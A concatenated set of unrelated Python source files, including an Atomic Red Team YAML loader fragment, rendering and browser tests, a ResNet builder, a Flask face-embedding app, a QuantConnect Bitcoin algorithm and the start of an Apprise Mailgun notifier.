raise AtomicsFolderNotFound('Unable to find any atomics folder')
else:
atomics_path = self.find_atomics(atomics_path)
if not atomics_path:
raise AtomicsFolderNotFound('Unable to find any atomics folder')
for atomic_entry in atomics_path:
technique = self.__get_file_name(atomic_entry)
if not self.__techniques.get(technique):
loaded_technique = self.load_technique(str(atomic_entry))
loaded_technique.update({'path': os.path.dirname(str(atomic_entry))})
self.__techniques[technique] = Atomic(**loaded_technique)
return self.__techniques
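# Illustrative only -- not part of the original module. A minimal sketch of how
# this loader is typically driven once Base.CONFIG.atomics_path has been set.
def _example_load_all_techniques():
    loader = Loader()
    techniques = loader.load_techniques()
    # Keys are technique IDs (e.g. 'T1003') taken from the yaml file names,
    # values are the Atomic objects built from the parsed yaml.
    for technique_id, atomic in techniques.items():
        print(technique_id, atomic)
    return techniques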
|
py | 7dfd052e7fe549f9a1139a6b479563a5dee56ead | from django.contrib import admin
from .models import Table
class TableAdmin(admin.ModelAdmin):
list_display = ("name", "price", "url",)
admin.site.register(Table, TableAdmin) |
py | 7dfd05614ce9702feb349ad4f932b89790d7d03c | # Copyright (c) 2016-2021 The Regents of the University of Michigan
# Part of fresnel, released under the BSD 3-Clause License.
"""Test the Scene class."""
import fresnel
import numpy
from collections import namedtuple
import PIL
import conftest
import os
import pathlib
dir_path = pathlib.Path(os.path.realpath(__file__)).parent
def test_background_color(device_):
"""Test the background_color property."""
scene = fresnel.Scene(device=device_)
scene.background_color = fresnel.color.linear((0.125, 0.75, 0.375))
numpy.testing.assert_array_equal(scene.background_color,
fresnel.color.linear((0.125, 0.75, 0.375)))
scene.background_alpha = 0.5
assert scene.background_alpha == 0.5
scene.camera = fresnel.camera.Orthographic(position=(0, 0, 10),
look_at=(0, 0, 0),
up=(0, 1, 0),
height=7)
buf_proxy = fresnel.preview(scene, w=100, h=100, anti_alias=False)
buf = buf_proxy[:]
numpy.testing.assert_array_equal(
buf[:, :, 3],
numpy.ones(shape=(100, 100), dtype=buf.dtype) * 128)
numpy.testing.assert_array_equal(
buf[:, :, 0:3],
numpy.ones(shape=(100, 100, 3), dtype=buf.dtype) * (32, 191, 96))
def test_camera(scene_hex_sphere_, generate=False):
"""Test the camera property."""
scene_hex_sphere_.camera = fresnel.camera.Orthographic(position=(1, 0, 10),
look_at=(1, 0, 0),
up=(0, 1, 0),
height=6)
numpy.testing.assert_array_equal(scene_hex_sphere_.camera.position,
(1, 0, 10))
numpy.testing.assert_array_equal(scene_hex_sphere_.camera.look_at,
(1, 0, 0))
numpy.testing.assert_array_equal(scene_hex_sphere_.camera.up, (0, 1, 0))
assert scene_hex_sphere_.camera.height == 6
buf_proxy = fresnel.preview(scene_hex_sphere_,
w=100,
h=100,
anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_camera.png', 'wb'), 'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:], dir_path / 'reference' / 'test_scene.test_camera.png')
def test_light_dir(scene_hex_sphere_, generate=False):
"""Test the lights property."""
scene_hex_sphere_.lights[0].direction = (1, 0, 0)
scene_hex_sphere_.lights[0].color = (0.5, 0.5, 0.5)
assert scene_hex_sphere_.lights[0].direction == (1, 0, 0)
assert scene_hex_sphere_.lights[0].color == (0.5, 0.5, 0.5)
buf_proxy = fresnel.preview(scene_hex_sphere_,
w=100,
h=100,
anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_light_dir.png', 'wb'), 'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_light_dir.png')
def test_multiple_geometries(device_, generate=False):
"""Test multiple geometries."""
scene = fresnel.Scene(lights=conftest.test_lights())
scene.camera = fresnel.camera.Orthographic(position=(0, 0, 10),
look_at=(0, 0, 0),
up=(0, 1, 0),
height=7)
geom1 = fresnel.geometry.Sphere(scene,
position=[[-4, 1, 0], [-4, -1, 0],
[-2, 1, 0], [-2, -1, 0]],
radius=1.0)
geom1.material = fresnel.material.Material(solid=1.0,
color=fresnel.color.linear(
[0.42, 0.267, 1]))
geom1.outline_width = 0.12
geom2 = fresnel.geometry.Sphere(scene,
position=[[4, 1, 0], [4, -1, 0], [2, 1, 0],
[2, -1, 0]],
radius=1.0)
geom2.material = fresnel.material.Material(solid=0.0,
color=fresnel.color.linear(
[1, 0.874, 0.169]))
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries1.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries1.png')
geom1.disable()
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries2.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries2.png')
geom1.enable()
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries3.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries3.png')
geom2.remove()
buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False)
if generate:
PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save(
open('output/test_scene.test_multiple_geometries4.png', 'wb'),
'png')
else:
conftest.assert_image_approx_equal(
buf_proxy[:],
dir_path / 'reference' / 'test_scene.test_multiple_geometries4.png')
if __name__ == '__main__':
struct = namedtuple("struct", "param")
device = conftest.device(struct(('cpu', None)))
scene = conftest.scene_hex_sphere(device)
test_camera(scene, generate=True)
scene = conftest.scene_hex_sphere(device)
test_light_dir(scene, generate=True)
scene = conftest.scene_hex_sphere(device)
test_multiple_geometries(scene, generate=True)
|
py | 7dfd0607f253f5b65eaa88b5d2c0988711c23a0a | import urllib.request as ur
import urllib
"""
2017 - 4 - 10 neko34
Fetch the corresponding data from the network and call the corresponding API.
"""
def openUrl(urlString):
html = ur.urlopen(urlString).read()
return html
|
py | 7dfd06c6f7c0121185935619390d90deea4527f1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import models, migrations
def create_profiles(apps, schema_editor):
"""
Make sure that any already-created users have profiles, as the profile
creation signal handler will never be triggered for already-existing users.
"""
User = apps.get_model(settings.AUTH_USER_MODEL)
UserProfile = apps.get_model('users', 'UserProfile')
for user in User.objects.all():
profile = UserProfile()
profile.user = user
profile.terms_of_use = False # Default value, but we're being explicit
profile.save()
class Migration(migrations.Migration):
dependencies = [
('users', '0009_userprofile'),
]
operations = [
migrations.RunPython(create_profiles)
]
|
py | 7dfd071e899187f1c780a867f77d355783f1ea78 | #!/usr/bin/env python
import src.network as network
from . import args
class NeuralNet:
def __init__(self):
self.args = args
def run(self):
network.startNetwork(self)
|
py | 7dfd07a9d0f7d7b0295b2177418e2123657298a5 | # QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Data import SubscriptionDataSource
from QuantConnect.Python import PythonData
from datetime import date, timedelta, datetime
import decimal
import numpy as np
import json
class CustomDataBitcoinAlgorithm(QCAlgorithm):
'''3.0 CUSTOM DATA SOURCE: USE YOUR OWN MARKET DATA (OPTIONS, FOREX, FUTURES, DERIVATIVES etc).
The new QuantConnect Lean Backtesting Engine is incredibly flexible and allows you to define your own data source.
This includes any data source which has a TIME and VALUE. These are the *only* requirements.
To demonstrate this we're loading in "Bitcoin" data.'''
def Initialize(self):
self.SetStartDate(2011, 9, 13)
self.SetEndDate(datetime.now().date() - timedelta(1))
self.SetCash(100000)
# Define the symbol and "type" of our generic data:
self.AddData(Bitcoin, "BTC")
def OnData(self, data):
if "BTC" not in data: return
close = data["BTC"].Close
        # If we don't hold any BTC "shares" -- invest
if not self.Portfolio.Invested:
            # Bitcoin used as a tradable asset, like stocks, futures etc.
self.SetHoldings("BTC", 1)
self.Debug("Buying BTC 'Shares': BTC: {0}".format(close))
self.Debug("Time: {0} {1}".format(datetime.now(), close))
class Bitcoin(PythonData):
'''Custom Data Type: Bitcoin data from Quandl - http://www.quandl.com/help/api-for-bitcoin-data'''
def GetSource(self, config, date, isLiveMode):
if isLiveMode:
return SubscriptionDataSource("https://www.bitstamp.net/api/ticker/", SubscriptionTransportMedium.Rest);
#return "http://my-ftp-server.com/futures-data-" + date.ToString("Ymd") + ".zip";
# OR simply return a fixed small data file. Large files will slow down your backtest
return SubscriptionDataSource("http://www.quandl.com/api/v1/datasets/BCHARTS/BITSTAMPUSD.csv?sort_order=asc", SubscriptionTransportMedium.RemoteFile);
def Reader(self, config, line, date, isLiveMode):
coin = Bitcoin()
coin.Symbol = config.Symbol
if isLiveMode:
# Example Line Format:
# {"high": "441.00", "last": "421.86", "timestamp": "1411606877", "bid": "421.96", "vwap": "428.58", "volume": "14120.40683975", "low": "418.83", "ask": "421.99"}
try:
liveBTC = json.loads(line)
# If value is zero, return None
value = decimal.Decimal(liveBTC["last"])
if value == 0: return None
coin.Time = datetime.now()
coin.Value = value
coin["Open"] = float(liveBTC["open"])
coin["High"] = float(liveBTC["high"])
coin["Low"] = float(liveBTC["low"])
coin["Close"] = float(liveBTC["last"])
coin["Ask"] = float(liveBTC["ask"])
coin["Bid"] = float(liveBTC["bid"])
coin["VolumeBTC"] = float(liveBTC["volume"])
coin["WeightedPrice"] = float(liveBTC["vwap"])
return coin
except ValueError:
# Do nothing, possible error in json decoding
return None
# Example Line Format:
# Date Open High Low Close Volume (BTC) Volume (Currency) Weighted Price
# 2011-09-13 5.8 6.0 5.65 5.97 58.37138238, 346.0973893944 5.929230648356
if not (line.strip() and line[0].isdigit()): return None
try:
data = line.split(',')
# If value is zero, return None
value = decimal.Decimal(data[4])
if value == 0: return None
coin.Time = datetime.strptime(data[0], "%Y-%m-%d")
coin.Value = value
coin["Open"] = float(data[1])
coin["High"] = float(data[2])
coin["Low"] = float(data[3])
coin["Close"] = float(data[4])
coin["VolumeBTC"] = float(data[5])
coin["VolumeUSD"] = float(data[6])
coin["WeightedPrice"] = float(data[7])
return coin;
except ValueError:
# Do nothing, possible error in json decoding
return None |
py | 7dfd090d19390cc3887ebbc41e1544317820758d | import numpy as np
from vecdb import VecDB
from flask import Flask, request, json, jsonify
from flask_sqlalchemy import SQLAlchemy
from sklearn.metrics.pairwise import cosine_similarity
from datetime import datetime
app = Flask(__name__)
# Database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
db = SQLAlchemy(app)
vdb = VecDB(filepath='data.h5', emb_dim=512)
# Face Model
class Face(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50))
embedding_key = db.Column(db.Integer)
created_at = db.Column(db.DateTime, default=datetime.now)
# Fake ML model
def model():
return np.random.randn(512)
# Routes
@app.route('/store', methods=['POST'])
def store():
name = request.form.get('name')
pred = model()
emb_key = vdb.store(pred)
face = Face(name=name, embedding_key=emb_key)
db.session.add(face)
db.session.commit()
return jsonify({ "status": "ok", "msg": "New face added" })
@app.route('/most_similar', methods=['POST'])
def most_similar():
emb = model()
key = vdb.most(emb, func=cosine_similarity)
face = Face.query.filter_by(embedding_key=int(key)).first()
if face is not None:
return jsonify({ "name": face.name })
return jsonify({ "status": "error", "msg": "Could not compare faces" })
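# Illustrative only -- not part of the original app. The two endpoints above are
# typically exercised with simple form-encoded POSTs, e.g. (hypothetical URLs,
# assuming the default Flask development server on port 5000):
#
#   curl -X POST -F "name=Alice" http://localhost:5000/store
#   curl -X POST http://localhost:5000/most_similar
#
# /store runs the (fake) embedding model, stores the vector in VecDB and the
# name in SQLite; /most_similar embeds again and returns the closest stored name.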
if __name__ == '__main__':
app.run() |
py | 7dfd0992d02804b22aa46d895bb8da4e39a4dd73 | """
Simple script that checks if a checkpoint is corrupted with any inf/NaN values. Run like this:
python inspect_checkpoint.py model.12345
"""
import tensorflow as tf
import sys
import numpy as np
if __name__ == '__main__':
if len(sys.argv) != 2:
raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.")
file_name = sys.argv[1]
reader = tf.train.NewCheckpointReader(file_name)
var_to_shape_map = reader.get_variable_to_shape_map()
finite = []
all_infnan = []
some_infnan = []
for key in sorted(var_to_shape_map.keys()):
tensor = reader.get_tensor(key)
print ("key: ", key)
print (tensor.shape)
if np.all(np.isfinite(tensor)):
finite.append(key)
else:
if not np.any(np.isfinite(tensor)):
all_infnan.append(key)
else:
some_infnan.append(key)
print ("\nFINITE VARIABLES:")
for key in finite: print (key)
print ("\n")
print ("finite: ", finite)
print ("\nVARIABLES THAT ARE ALL INF/NAN:")
for key in all_infnan: print (key)
print ("\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:")
for key in some_infnan: print (key)
print ("")
if not all_infnan and not some_infnan:
print ("CHECK PASSED: checkpoint contains no inf/NaN values")
else:
print ("CHECK FAILED: checkpoint contains some inf/NaN values")
|
py | 7dfd0c41f7e10fa822b2beefcd4bb6913acaa8e0 | # -*- coding: utf-8 -*-
import sys
from app.wechat import wechat
if sys.version_info.major != 3:
exit('Please run under Python3')
if __name__ == '__main__':
obj = wechat()
obj.run()
|
py | 7dfd0f65393c61f4802f1d99dec8712b4767e518 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..legacy import antsIntroduction
def test_antsIntroduction_inputs():
input_map = dict(args=dict(argstr='%s',
),
bias_field_correction=dict(argstr='-n 1',
),
dimension=dict(argstr='-d %d',
position=1,
usedefault=True,
),
environ=dict(nohash=True,
usedefault=True,
),
force_proceed=dict(argstr='-f 1',
),
ignore_exception=dict(deprecated='1.0.0',
nohash=True,
usedefault=True,
),
input_image=dict(argstr='-i %s',
copyfile=False,
mandatory=True,
),
inverse_warp_template_labels=dict(argstr='-l',
),
max_iterations=dict(argstr='-m %s',
sep='x',
),
num_threads=dict(nohash=True,
usedefault=True,
),
out_prefix=dict(argstr='-o %s',
usedefault=True,
),
quality_check=dict(argstr='-q 1',
),
reference_image=dict(argstr='-r %s',
copyfile=True,
mandatory=True,
),
similarity_metric=dict(argstr='-s %s',
),
terminal_output=dict(deprecated='1.0.0',
nohash=True,
),
transformation_model=dict(argstr='-t %s',
usedefault=True,
),
)
inputs = antsIntroduction.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_antsIntroduction_outputs():
output_map = dict(affine_transformation=dict(),
input_file=dict(),
inverse_warp_field=dict(),
output_file=dict(),
warp_field=dict(),
)
outputs = antsIntroduction.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
|
py | 7dfd101f7c659900c0fd39f39be906b9459c09d7 | L=[3,5]
L[0:0]= [1,2]
L[3:3]= [4]
L[len(L):len(L)]=[6]
print(L)
L[:]=L[::-1]
print(L) |
py | 7dfd116a1deb520477b0290436d1d36fd4e5a3dd | import math
import numpy as np
import tensorflow.keras.layers as KL
from mrcnn.layers import BatchNorm
############################################################
# Resnet Graph
############################################################
# Code adopted from:
# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
def identity_block(input_tensor, kernel_size, filters, stage, block,
use_bias=True, train_bn=True):
"""The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',
use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',
use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
x = KL.Add()([x, input_tensor])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block,
strides=(2, 2), use_bias=True, train_bn=True):
"""conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_bias: Boolean. To use or not use a bias in conv layers.
train_bn: Boolean. Train or freeze Batch Norm layers
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
"""
nb_filter1, nb_filter2, nb_filter3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)
x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +
'2c', use_bias=use_bias)(x)
x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)
shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', use_bias=use_bias)(input_tensor)
shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)
x = KL.Add()([x, shortcut])
x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)
return x
def resnet_graph(input_image, architecture, stage5=False, train_bn=True):
"""Build a ResNet graph.
architecture: Can be resnet50 or resnet101
stage5: Boolean. If False, stage5 of the network is not created
train_bn: Boolean. Train or freeze Batch Norm layers
"""
assert architecture in ["resnet50", "resnet101"]
# Stage 1
x = KL.ZeroPadding2D((3, 3))(input_image)
x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)
x = BatchNorm(name='bn_conv1')(x, training=train_bn)
x = KL.Activation('relu')(x)
C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x)
# Stage 2
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)
C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)
# Stage 3
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)
C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)
# Stage 4
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)
block_count = {"resnet50": 5, "resnet101": 22}[architecture]
for i in range(block_count):
x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)
C4 = x
# Stage 5
if stage5:
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)
C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)
else:
C5 = None
return [C1, C2, C3, C4, C5]
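# Illustrative only -- not part of the original module. A minimal sketch of how
# resnet_graph is wired into a Keras functional model; the 1024x1024 RGB input
# shape is an arbitrary assumption for the example.
def _example_build_resnet_backbone():
    input_image = KL.Input(shape=[1024, 1024, 3], name="input_image")
    C1, C2, C3, C4, C5 = resnet_graph(input_image, "resnet101",
                                      stage5=True, train_bn=False)
    # C2..C5 are the feature maps an FPN-style head would consume.
    return [C1, C2, C3, C4, C5]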
|
py | 7dfd11867046d429a132d73377bb2d01b0db4b32 | """Package with meta steps for tests of oneprovider using web GUI.
"""
__author__ = "Michal Stanisz"
__copyright__ = "Copyright (C) 2017 ACK CYFRONET AGH"
__license__ = "This software is released under the MIT license cited in " \
"LICENSE.txt"
|
py | 7dfd11e941777f7b3219e2a16afeb190194c836e | # -*- coding: utf-8 -*-
"""
PyQt5 tutorial
In this example we draw 6 lines using
different pen styles.
author: py40.com
last edited: March 2017
"""
import sys
from PyQt5.QtWidgets import QWidget, QApplication
from PyQt5.QtGui import QPainter, QColor, QPen
from PyQt5.QtCore import Qt
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 280, 270)
self.setWindowTitle('Pen styles')
self.show()
def paintEvent(self, e):
qp = QPainter()
qp.begin(self)
self.drawLines(qp)
qp.end()
def drawLines(self, qp):
pen = QPen(Qt.black, 2, Qt.SolidLine)
qp.setPen(pen)
qp.drawLine(20, 40, 250, 40)
pen.setStyle(Qt.DashLine)
qp.setPen(pen)
qp.drawLine(20, 80, 250, 80)
pen.setStyle(Qt.DashDotLine)
qp.setPen(pen)
qp.drawLine(20, 120, 250, 120)
pen.setStyle(Qt.DotLine)
qp.setPen(pen)
qp.drawLine(20, 160, 250, 160)
pen.setStyle(Qt.DashDotDotLine)
qp.setPen(pen)
qp.drawLine(20, 200, 250, 200)
pen.setStyle(Qt.CustomDashLine)
pen.setDashPattern([1, 4, 5, 4])
qp.setPen(pen)
qp.drawLine(20, 240, 250, 240)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
|
py | 7dfd120a2408f689e35fa276a11d05bcb375fb71 | from marionette_driver.errors import JavascriptException
from marionette_harness import MarionetteTestCase
import testsuite
class Test(MarionetteTestCase):
def setUp(self):
MarionetteTestCase.setUp(self)
ts = testsuite.TestSuite()
self.ts = ts
self.marionette.set_pref("network.proxy.allow_hijacking_localhost", False)
def test_svg(self):
m = self.marionette
svg_enabled = self.ts.t['test']['name'] == 'svg-enable'
self.assertEqual(self.marionette.get_pref('svg.disabled'),
not svg_enabled,
msg="svg.disabled is not set correctly")
self.marionette.timeout.implicit = 1
with m.using_context('content'):
# img src url
m.navigate(self.marionette.absolute_url("svg/img_src_url.html"))
svg_elt = m.find_element('id', 'svgImgElem')
self.assertEqual(svg_elt.get_property('width'),
450 if svg_enabled else 24,
msg="img src url")
# img data url
m.navigate(self.marionette.absolute_url("svg/img_data_url.html"))
svg_elt = m.find_element('id', 'svgImgElem')
self.assertEqual(svg_elt.get_property('width'),
300 if svg_enabled else 24,
msg="img data url")
# object data url
m.navigate(self.marionette.absolute_url("svg/object_data_url.html"))
width = m.execute_script('''
var elt = document.getElementById("svgObjectElem");
return elt.getBoundingClientRect().width;
''')
self.assertEqual(width,
450 if svg_enabled else 300,
msg="object data url")
# object remote url
m.navigate(self.marionette.absolute_url("svg/object_remote_url.html"))
svg_elt = m.find_element('id', 'svgObjectElem')
width = m.execute_script('''
var elt = document.getElementById("svgObjectElem");
return elt.getBoundingClientRect().width;
''')
self.assertEqual(width,
450 if svg_enabled else 300,
msg="object remote url")
# inline svg
m.navigate(self.marionette.absolute_url("svg/inline_svg.html"))
try:
elt_width = m.execute_script('''
var elt = document.getElementById("inlineSVG");
return elt.width.baseVal.value;
''')
except JavascriptException:
elt_width = None
self.assertEqual(elt_width,
300 if svg_enabled else None,
msg='inline svg')
# iframe remote url
m.navigate(self.marionette.absolute_url("svg/iframe_remote_url.html"))
m.switch_to_frame(m.find_element('id', 'svgIframeElem'))
svg_elt = m.find_element('tag name', 'svg')
width = m.execute_script('''
var elt = document.getElementsByTagName("svg")[0];
return elt.getBoundingClientRect().width;
''')
self.assertEqual(width,
450 if svg_enabled else 500,
msg="iframe remote url prompt")
|
py | 7dfd123718e5bf455f9b765c57a115ec8aee43c1 | # -*- coding: utf-8 -*-
import unittest
from letter_combinations import letter_combinations
class TestLetterCombinations(unittest.TestCase):
def test_letter_combinations(self):
tests = [
('', []),
('9', ["w", "x", "y", "z"]),
('91', ["w", "x", "y", "z"]),
('23', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('213', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('123', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('231', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]),
('111111', []),
]
for test in tests:
actual = letter_combinations(test[0])
expected = test[1]
self.assertEqual(len(actual), len(expected), \
'expected {} should have the same length as actual {}'\
.format(test, actual))
for exp in expected:
self.assertIn(exp, actual, \
'expected {} to be in actual {}'.format(exp, actual))
|
py | 7dfd1248df97a3921947b48a98914ab3a426274c | # -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <[email protected]>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Signup @ https://www.mailgun.com/
#
# Each domain will have an API key associated with it. If you sign up you'll
# get a sandbox domain to use. Or if you set up your own, they'll have
# api keys associated with them too. Find your API key out by visiting
# https://app.mailgun.com/app/domains
#
# From here you can click on the domain you're interested in. You can acquire
# the API Key from here which will look something like:
# 4b4f2918c6c21ba0a26ad2af73c07f4d-dk5f51da-8f91a0df
#
# You'll also need to know the domain that is associated with your API key.
# This will be obvious with a paid account because it will be the domain name
# you've registered with them. But if you're using a test account, it will
# be name of the sandbox you've set up such as:
# sandbox74bda3414c06kb5acb946.mailgun.org
#
# Knowing this, you can buid your mailgun url as follows:
# mailgun://{user}@{domain}/{apikey}
# mailgun://{user}@{domain}/{apikey}/{email}
#
# You can email as many addresses as you want as:
# mailgun://{user}@{domain}/{apikey}/{email1}/{email2}/{emailN}
#
# The {user}@{domain} effectively assembles the 'from' email address
# the email will be transmitted from. If no email address is specified
# then it will also become the 'to' address as well.
#
import requests
from .NotifyBase import NotifyBase
from ..common import NotifyType
from ..utils import parse_list
from ..utils import is_email
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
# Provide some known codes Mailgun uses and what they translate to:
# Based on https://documentation.mailgun.com/en/latest/api-intro.html#errors
MAILGUN_HTTP_ERROR_MAP = {
400: 'A bad request was made to the server.',
401: 'The provided API Key was not valid.',
402: 'The request failed for a reason out of your control.',
404: 'The requested API query is not valid.',
    413: 'Provided attachment is too big.',
}
# Priorities
class MailgunRegion(object):
US = 'us'
EU = 'eu'
# Mailgun APIs
MAILGUN_API_LOOKUP = {
MailgunRegion.US: 'https://api.mailgun.net/v3/',
MailgunRegion.EU: 'https://api.eu.mailgun.net/v3/',
}
# A List of our regions we can use for verification
MAILGUN_REGIONS = (
MailgunRegion.US,
MailgunRegion.EU,
)
class NotifyMailgun(NotifyBase):
"""
A wrapper for Mailgun Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Mailgun'
# The services URL
service_url = 'https://www.mailgun.com/'
# All notification requests are secure
secure_protocol = 'mailgun'
# Mailgun advertises they allow 300 requests per minute.
# 60/300 = 0.2
request_rate_per_sec = 0.20
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_mailgun'
# The default region to use if one isn't otherwise specified
mailgun_default_region = MailgunRegion.US
# Define object templates
templates = (
'{schema}://{user}@{host}:{apikey}/',
'{schema}://{user}@{host}:{apikey}/{targets}',
)
